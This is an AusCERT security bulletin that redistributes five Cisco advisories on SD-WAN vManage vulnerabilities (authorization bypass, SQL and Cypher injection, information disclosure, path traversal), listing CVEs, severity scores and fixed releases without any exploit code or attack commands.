-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2021.0244 Cisco SD-WAN vManage multiple vulnerabilities 21 January 2021 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: Cisco SD-WAN vManage Software Publisher: Cisco Systems Operating System: Cisco Impact/Access: Modify Arbitrary Files -- Remote/Unauthenticated Create Arbitrary Files -- Existing Account Access Confidential Data -- Remote/Unauthenticated Unauthorised Access -- Existing Account Resolution: Patch/Upgrade CVE Names: CVE-2021-1349 CVE-2021-1305 CVE-2021-1304 CVE-2021-1302 CVE-2021-1259 CVE-2021-1235 CVE-2021-1225 Original Bulletin: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-abyp-TnGFHrS https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vmanage-cql-inject-72EhnUc https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-vinfdis-MC8L58dj https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vman-sqlinjm-xV8dsjq5 https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vman-pathtrav-Z5mCVsjf Comment: This bulletin contains five (5) Cisco Systems security advisories. - --------------------------BEGIN INCLUDED TEXT-------------------- Cisco SD-WAN vManage Authorization Bypass Vulnerabilities Priority: High Advisory ID: cisco-sa-sdwan-abyp-TnGFHrS First Published: 2021 January 20 16:00 GMT Version 1.0: Final Workarounds: No workarounds available Cisco Bug IDs: CSCvi59734 CSCvs11283 CSCvu28377 CVE Names: CVE-2021-1302 CVE-2021-1304 CVE-2021-1305 CWEs: CWE-20 CWE-284 Summary o Multiple vulnerabilities in the web-based management interface of Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to bypass authorization and modify the configuration of an affected system, gain access to sensitive information, and view information that they are not authorized to access. For more information about these vulnerabilities, see the Details section of this advisory. Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. This advisory is available at the following link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-abyp-TnGFHrS Affected Products o Vulnerable Products These vulnerabilities affect Cisco devices if they are running a vulnerable release of Cisco SD-WAN vManage Software. For a device to be affected by CVE-2021-1302, the Multi-Tenant feature must be enabled. For information about which Cisco software releases are vulnerable, see the Fixed Software section of this advisory. Products Confirmed Not Vulnerable Only products listed in the Vulnerable Products section of this advisory are known to be affected by these vulnerabilities. Cisco has confirmed that these vulnerabilities do not affect the following products: IOS XE SD-WAN Software SD-WAN vBond Orchestrator Software SD-WAN vEdge Cloud Routers SD-WAN vEdge Routers SD-WAN vSmart Controller Software Details o The vulnerabilities are not dependent on one another; exploitation of one of the vulnerabilities is not required to exploit another vulnerability. In addition, a software release that is affected by one of the vulnerabilities may not be affected by the other vulnerabilities. Details about the vulnerabilities are as follows: CVE-2021-1302: Cisco SD-WAN vManage Authorization Bypass Vulnerability A vulnerability in the web-based management interface of Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to bypass authorization and connect to other vManage tenants that they are not authorized to connect to. The vulnerability is due to insufficient authorization checks. An attacker could exploit this vulnerability by sending crafted HTTP requests to the web-based management interface of an affected system. A successful exploit could allow the attacker to bypass authorization and connect to other vManage tenants that they are not authorized to connect to. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. Bug ID(s): CSCvu28377 CVE ID: CVE-2021-1302 Security Impact Rating (SIR): High CVSS Base Score: 8.8 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2021-1304: Cisco SD-WAN vManage Authorization Bypass Vulnerability A vulnerability in the web-based management interface SSH console of Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to access sensitive information that they are not normally authorized to access. The vulnerability is due to insufficient authorization checks. An attacker could exploit this vulnerability by logging in to the web-based management interface and using the SSH console feature. A successful exploit could allow the attacker to access sensitive information, which would allow them to carry out further attacks. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. Bug ID(s): CSCvs11283 CVE ID: CVE-2021-1304 Security Impact Rating (SIR): Medium CVSS Base Score: 4.3 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N CVE-2021-1305: Cisco SD-WAN vManage Authorization Bypass Vulnerability A vulnerability in the web-based management interface of Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to access information such as logs, configurations, and device information that they are not authorized to view. The vulnerability is due to insufficient authorization checks of user account privileges. An attacker could exploit this vulnerability by logging in to the web-based management interface with a low-privileged user account. A successful exploit could allow the attacker to access sensitive information that they are not authorized to view. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. Bug ID(s): CSCvi59734 CVE ID: CVE-2021-1305 Security Impact Rating (SIR): Medium CVSS Base Score: 4.3 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N Workarounds o There are no workarounds that address these vulnerabilities. Fixed Software o Cisco has released free software updates that address the vulnerabilities described in this advisory. Customers may only install and expect support for software versions and feature sets for which they have purchased a license. By installing, downloading, accessing, or otherwise using such software upgrades, customers agree to follow the terms of the Cisco software license: https://www.cisco.com/c/en/us/products/end-user-license-agreement.html Additionally, customers may only download software for which they have a valid license, procured from Cisco directly, or through a Cisco authorized reseller or partner. In most cases this will be a maintenance upgrade to software that was previously purchased. Free security software updates do not entitle customers to a new software license, additional software feature sets, or major revision upgrades. When considering software upgrades , customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories page , to determine exposure and a complete upgrade solution. In all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers. Customers Without Service Contracts Customers who purchase directly from Cisco but do not hold a Cisco service contract and customers who make purchases through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should obtain upgrades by contacting the Cisco TAC: https://www.cisco.com/c /en/us/support/web/tsd-cisco-worldwide-contacts.html Customers should have the product serial number available and be prepared to provide the URL of this advisory as evidence of entitlement to a free upgrade. Fixed Releases Customers are advised to upgrade to an appropriate fixed software release as indicated in the following table(s). To ensure a complete upgrade solution, consider that this advisory is part of a collection that includes the following advisories: cisco-sa-sdwan-abyp-TnGFHrS : Cisco SD-WAN vManage Authorization Bypass Vulnerabilities cisco-sa-sdwan-bufovulns-B5NrSHbj : Cisco SD-WAN Buffer Overflow Vulnerabilities cisco-sa-sdwan-cmdinjm-9QMSmgcn : Cisco SD-WAN Command Injection Vulnerabilities cisco-sa-sdwan-dosmulti-48jJuEUP : Cisco SD-WAN Denial of Service Vulnerabilities Cisco First Fixed Release First Fixed Release for All SD-WAN for These Vulnerabilities Described in the Release Vulnerabilities Collection of Advisories Earlier Migrate to a fixed Migrate to a fixed release. than 18.3 release. 18.3 Migrate to a fixed Migrate to a fixed release. release. 18.4 Migrate to a fixed Migrate to a fixed release. release. 19.2 Migrate to a fixed Migrate to a fixed release. release. 19.3 Migrate to a fixed Migrate to a fixed release. release. 20.1 Migrate to a fixed Migrate to a fixed release. release. 20.3 20.3.2 20.3.2 20.4 20.4.1 20.4.1 Exploitation and Public Announcements o The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerabilities that are described in this advisory. Source o These vulnerabilities were found during the resolution of a Cisco TAC support case. Cisco Security Vulnerability Policy o To learn about Cisco security vulnerability disclosure policies and publications, see the Security Vulnerability Policy . This document also contains instructions for obtaining fixed software and receiving security vulnerability information from Cisco. URL o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-abyp-TnGFHrS Revision History o +----------+---------------------------+----------+--------+--------------+ | Version | Description | Section | Status | Date | +----------+---------------------------+----------+--------+--------------+ | 1.0 | Initial public release. | - | Final | 2021-JAN-20 | +----------+---------------------------+----------+--------+--------------+ - -------------------------------------------------------------------------------- Cisco SD-WAN vManage Cypher Query Language Injection Vulnerability Priority: Medium Advisory ID: cisco-sa-vmanage-cql-inject-72EhnUc First Published: 2021 January 20 16:00 GMT Version 1.0: Final Workarounds: No workarounds available Cisco Bug IDs: CSCvv42576 CSCvw08529 CVE Names: CVE-2021-1349 CWEs: CWE-943 Summary o A vulnerability in the web-based management interface of Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to conduct Cypher query language injection attacks on an affected system. The vulnerability is due to insufficient input validation by the web-based management interface. An attacker could exploit this vulnerability by sending crafted HTTP requests to the interface of an affected system. A successful exploit could allow the attacker to obtain sensitive information. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vmanage-cql-inject-72EhnUc Affected Products o Vulnerable Products At the time of publication, this vulnerability affected Cisco SD-WAN vManage Software releases earlier than Release 20.3.2. Products Confirmed Not Vulnerable Only products listed in the Vulnerable Products section of this advisory are known to be affected by this vulnerability. Workarounds o There are no workarounds that address this vulnerability. Fixed Software o When considering software upgrades , customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories page , to determine exposure and a complete upgrade solution. In all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers. Fixed Releases At the time of publication, Cisco SD-WAN vManage Software releases 20.3.2 and later contained the fix for this vulnerability. See the Details section in the bug ID(s) at the top of this advisory for the most complete and current information. Exploitation and Public Announcements o The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory. Source o Cisco would like to thank the following people for independently reporting this vulnerability: Jakub Olszak and Stefan Zaryn Pawel Haldrzynski of ISEC Partners Cisco Security Vulnerability Policy o To learn about Cisco security vulnerability disclosure policies and publications, see the Security Vulnerability Policy . This document also contains instructions for obtaining fixed software and receiving security vulnerability information from Cisco. URL o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vmanage-cql-inject-72EhnUc Revision History o +----------+---------------------------+----------+--------+--------------+ | Version | Description | Section | Status | Date | +----------+---------------------------+----------+--------+--------------+ | 1.0 | Initial public release. | - | Final | 2021-JAN-20 | +----------+---------------------------+----------+--------+--------------+ - -------------------------------------------------------------------------------- Cisco SD-WAN vManage Information Disclosure Vulnerability Priority: Medium Advisory ID: cisco-sa-sdwan-vinfdis-MC8L58dj First Published: 2021 January 20 16:00 GMT Version 1.0: Final Workarounds: No workarounds available Cisco Bug IDs: CSCvs11276 CVE Names: CVE-2021-1235 CWEs: CWE-497 CVSS Score: 5.5 AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:X/RL:X/RC:X Summary o A vulnerability in the CLI of Cisco SD-WAN vManage Software could allow an authenticated, local attacker to read sensitive database files on an affected system. The vulnerability is due to insufficient user authorization. An attacker could exploit this vulnerability by accessing the vshell of an affected system. A successful exploit could allow the attacker to read database files from the filesystem of the underlying operating system. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-vinfdis-MC8L58dj Affected Products o Vulnerable Products At the time of publication, this vulnerability affected Cisco SD-WAN vManage releases earlier than Release 19.2.3. See the Details section in the bug ID(s) at the top of this advisory for the most complete and current information. Products Confirmed Not Vulnerable Only products listed in the Vulnerable Products section of this advisory are known to be affected by this vulnerability. Workarounds o There are no workarounds that address this vulnerability. Fixed Software o When considering software upgrades , customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories page , to determine exposure and a complete upgrade solution. In all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers. Fixed Releases At the time of publication, Cisco SD-WAN vManage releases 19.2.3, 20.1.1, 20.3.1, 20.4.1, and later contained the fix for this vulnerability. See the Details section in the bug ID(s) at the top of this advisory for the most complete and current information. Exploitation and Public Announcements o The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory. Source o This vulnerability was found during the resolution of a Cisco TAC support case. Cisco Security Vulnerability Policy o To learn about Cisco security vulnerability disclosure policies and publications, see the Security Vulnerability Policy . This document also contains instructions for obtaining fixed software and receiving security vulnerability information from Cisco. URL o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-vinfdis-MC8L58dj Revision History o +----------+---------------------------+----------+--------+--------------+ | Version | Description | Section | Status | Date | +----------+---------------------------+----------+--------+--------------+ | 1.0 | Initial public release. | - | Final | 2021-JAN-20 | +----------+---------------------------+----------+--------+--------------+ - -------------------------------------------------------------------------------- Cisco SD-WAN vManage SQL Injection Vulnerabilities Priority: Medium Advisory ID: cisco-sa-vman-sqlinjm-xV8dsjq5 First Published: 2021 January 20 16:00 GMT Version 1.0: Final Workarounds: No workarounds available Cisco Bug IDs: CSCvi59726 CSCvk28609 CSCvk28656 CSCvk28667 CSCvs99259 CVE Names: CVE-2021-1225 CWEs: CWE-89 CVSS Score: 6.5 AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N/E:X/RL:X/RC:X Summary o Multiple vulnerabilities in the web-based management interface of Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to conduct SQL injection attacks on an affected system. These vulnerabilities exist because the web-based management interface improperly validates values in SQL queries. An attacker could exploit these vulnerabilities by authenticating to the application and sending malicious SQL queries to an affected system. A successful exploit could allow the attacker to modify values on or return values from the underlying database or the operating system. Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. This advisory is available at the following link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vman-sqlinjm-xV8dsjq5 Affected Products o Vulnerable Products At the time of publication, these vulnerabilities affected Cisco SD-WAN vManage Software releases earlier than Release 19.2.3. See the Details section in the bug ID(s) at the top of this advisory for the most complete and current information. Products Confirmed Not Vulnerable Only products listed in the Vulnerable Products section of this advisory are known to be affected by these vulnerabilities. Workarounds o There are no workarounds that address these vulnerabilities. Fixed Software o When considering software upgrades , customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories page , to determine exposure and a complete upgrade solution. In all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers. Fixed Releases At the time of publication, Cisco SD-WAN vManage releases 19.2.3 and later contained the fix for these vulnerabilities. See the Details section in the bug ID(s) at the top of this advisory for the most complete and current information. Exploitation and Public Announcements o The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerabilities that are described in this advisory. Source o These vulnerabilities were found during internal security testing. Cisco Security Vulnerability Policy o To learn about Cisco security vulnerability disclosure policies and publications, see the Security Vulnerability Policy . This document also contains instructions for obtaining fixed software and receiving security vulnerability information from Cisco. URL o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vman-sqlinjm-xV8dsjq5 Revision History o +----------+---------------------------+----------+--------+--------------+ | Version | Description | Section | Status | Date | +----------+---------------------------+----------+--------+--------------+ | 1.0 | Initial public release. | - | Final | 2021-JAN-20 | +----------+---------------------------+----------+--------+--------------+ - -------------------------------------------------------------------------------- Cisco SD-WAN vManage Software Path Traversal Vulnerability Priority: Medium Advisory ID: cisco-sa-vman-pathtrav-Z5mCVsjf First Published: 2021 January 20 16:00 GMT Version 1.0: Final Workarounds: No workarounds available Cisco Bug IDs: CSCvi59632 CSCvk28549 CVE Names: CVE-2021-1259 CWEs: CWE-22 CVSS Score: 5.3 AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N/E:X/RL:X/RC:X Summary o A vulnerability in the web-based management interface of Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to conduct path traversal attacks and obtain write access to sensitive files on an affected system. The vulnerability is due to insufficient validation of HTTP requests. An attacker could exploit this vulnerability by sending a crafted HTTP request that contains directory traversal character sequences to an affected system. A successful exploit could allow the attacker to write arbitrary files on the affected system. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vman-pathtrav-Z5mCVsjf Affected Products o Vulnerable Products At the time of publication, this vulnerability affected Cisco SD-WAN vManage Software releases earlier than Release 18.2.0. See the Details section in the bug ID(s) at the top of this advisory for the most complete and current information. Products Confirmed Not Vulnerable Only products listed in the Vulnerable Products section of this advisory are known to be affected by this vulnerability. Workarounds o There are no workarounds that address this vulnerability. Fixed Software o When considering software upgrades , customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories page , to determine exposure and a complete upgrade solution. In all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers. Fixed Releases At the time of publication, Cisco SD-WAN vManage Software releases 18.2.0 and later contained the fix for this vulnerability. See the Details section in the bug ID(s) at the top of this advisory for the most complete and current information. Exploitation and Public Announcements o The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory. Source o This vulnerability was found during the resolution of a Cisco TAC support case. Cisco Security Vulnerability Policy o To learn about Cisco security vulnerability disclosure policies and publications, see the Security Vulnerability Policy . This document also contains instructions for obtaining fixed software and receiving security vulnerability information from Cisco. URL o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vman-pathtrav-Z5mCVsjf Revision History o +----------+---------------------------+----------+--------+--------------+ | Version | Description | Section | Status | Date | +----------+---------------------------+----------+--------+--------------+ | 1.0 | Initial public release. | - | Final | 2021-JAN-20 | +----------+---------------------------+----------+--------+--------------+ - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: http://www.auscert.org.au/render.html?it=1967 iQIVAwUBYAkQqONLKJtyKPYoAQh71w//ZO2oStoj8NxqbKsuFbrli2IS1+0gt+Ic jaZuwn9YpMO3LZtTPFzYvM9lK5Ui3xZNJqmVb7Culy0T+yS57N7wTJee/CRfxcw9 8KV0ilkfAZISNig/ihYQtPgUbH1YZLhXuMUPV6SJIdvRGSg79s7b0PHtJFgDOKxv FwA/DrOiPIRBBe80USulj6Gfa211+uQ1QqZgS1AKsaVfqYa0k0WuPYkQTRwPgMHr UvfygLzliGOd/8145PZP3EHR528nyJFCcWGjRM6pi0NhxAzhlic1HN0SkpTC5AvI ZN6gBrzZ/fjgivSP/L+6pHQDqoYizxNRnivd6ZkaKflQF3MMKEnDEcxYr89l35YH 35ZZSNkqDkbHE+pk4f6PYQR8ioywrwbEcwz9cxF6g+HjjFZkz+XZptU4h4pRv4O0 qjw3lMUgrC7AXRP3Lu/CGY0TfpAT1SPy6cE6//eg2aFKJrQ+bF3hrKx78kFuFERD o1aRLY6Hffsa+V15OxWQzuOrr5RW5CoKqSjTzBIwrw79WVKQa9GOrJI7wu/Kfm37 74eYzD0zQGiPjs+XiNc0Yj0c+NF8KA0MHvaSGl+vKsLSvy9AV7feGC5R3W99GGta kSeZ9BE68aP9kqWEA0+Ff6IRZiBmD1I3Je1Eog1ZblHKT+IyWiTQklyzqRGMQZQq gufnx62RlwA= =frXg -----END PGP SIGNATURE-----